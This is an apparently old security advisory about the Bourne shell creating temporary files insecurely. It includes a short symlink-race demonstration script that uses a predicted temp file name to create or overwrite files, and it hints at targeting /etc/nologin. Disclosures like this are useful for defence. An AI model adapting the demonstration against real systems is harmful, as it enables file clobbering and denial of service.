COMMAND

    /bin/sh

SYSTEMS AFFECTED

    most unices

PROBLEM

    Paul Szabo found following.   Similarly to the recently  discussed
    tcsh  vulnerability,  the  Bourne   shell  /bin/sh  also   creates
    temporary  files  in  an  insecure  way,  and  can be exploited to
    create arbitrary files  or to overwrite  existing ones.   For tcsh
    see:

        http://oliver.efri.hr/~crv/security/bugs/mUNIXes/tcsh2.html

    While this vulnerability can be exploited for a  denial-of-service
    attack,  it  is  not  clear  how  to  use  it  to  gain additional
    privileges.

    Demonstration:

        #!/bin/sh -x
        ls -l /tmp/nologin
        ln -s /tmp/nologin /tmp/sh$$0
        cat <<EOF
        Only root can create /etc/nologin.
        Do any boot-time scripts use sh?
        EOF
        ls -l /tmp/nologin

SOLUTION

    FreeBSD does not seem to do this.